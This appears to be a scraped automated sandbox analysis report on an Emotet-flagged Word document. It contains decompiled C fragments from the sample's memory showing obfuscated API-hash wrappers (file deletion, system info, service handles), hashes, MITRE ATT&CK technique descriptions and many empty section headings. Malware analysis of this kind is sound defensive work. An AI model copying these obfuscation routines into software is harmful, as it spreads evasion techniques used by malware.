0x001f7687
0x001f7693
0x001f769a
0x001f76a1
0x001f76a5
0x001f76a9
0x001f76c2
0x001f76d5
0x001f76da

APIs

QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,001F620E,00000000,?,?), ref: 001F76D5

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
Instruction ID: 4dbc98de87c35507923770c75f5dd1e2d381d7f3ef29344095bcb726f1c3b3ae
Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
Instruction Fuzzy Hash: 2601197690020DFFEF059F90CC46EAEBFB5EF44744F108198FA1566261D7B29B609B90

Uniqueness

Uniqueness Score: -1.00%

Function 0020AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002007A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0020aa3f
0x0020aa40
0x0020aa41
0x0020aa44
0x0020aa47
0x0020aa4b
0x0020aa4c
0x0020aa51
0x0020aa5b
0x0020aa64
0x0020aa68
0x0020aa6f
0x0020aa76
0x0020aa8d
0x0020aa90
0x0020aa9d
0x0020aaa8
0x0020aaad

APIs

DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 0020AAA8

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
Instruction ID: 47197d10c455c84a89c7741739c354172d350b13dcd5ceef6f090ec2054df0fc
Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
Instruction Fuzzy Hash: F0F069B190020CFFDF08DF94DD4A99EBFB4EB41304F108088F905A6260D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00209A56, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00209A56(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				void* _t29;

				_t29 = __ecx;
				E001F602B(_t18);
				_v12 = 0x9a38;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00004339;
				_v8 = 0x299d;
				_v8 = _v8 + 0xa1ce;
				_v8 = _v8 | 0xc5f89a67;
				_v8 = _v8 + 0x125d;
				_v8 = _v8 ^ 0xc5f8b599;
				_t22 = E002007A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
				return _t23;
			}

0x00209a5f
0x00209a63
0x00209a68
0x00209a72
0x00209a7b
0x00209a82
0x00209a89
0x00209a90
0x00209a97
0x00209a9e
0x00209ab7
0x00209ac0
0x00209ac6

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00209AC0

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
Instruction ID: d902b40c818dc31961225c0fedd793606ad0534c1e2b2d7392616aa18527dcf4
Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
Instruction Fuzzy Hash: 80F037B1901318FFEB08DB94D94A8DEBAB8EF52314F208088F40466241E7B51F548BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001F5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002007A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001f5fb5
0x001f5fb6
0x001f5fb7
0x001f5fbb
0x001f5fbc
0x001f5fc1
0x001f5fcb
0x001f5fd7
0x001f5fde
0x001f5fe5
0x001f5ffc
0x001f5fff
0x001f6006
0x001f600d
0x001f601a
0x001f6025
0x001f602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001F6025

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
Instruction ID: 69b7a602794ff9f7d4ed518adff1221bfcb0fd5835044999a835a919fe29db3f
Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
Instruction Fuzzy Hash: ADF04FB0C1120CFFEB08DFA0E94689EBFB8EB40300F208198E509A7260E7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MAIL-0573188.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "MAIL-0573188.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117

General

VBA Code Keywords

VBA Code

VBA File Name: Owppnp8hah4xo788, Stream Size: 17915

General

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre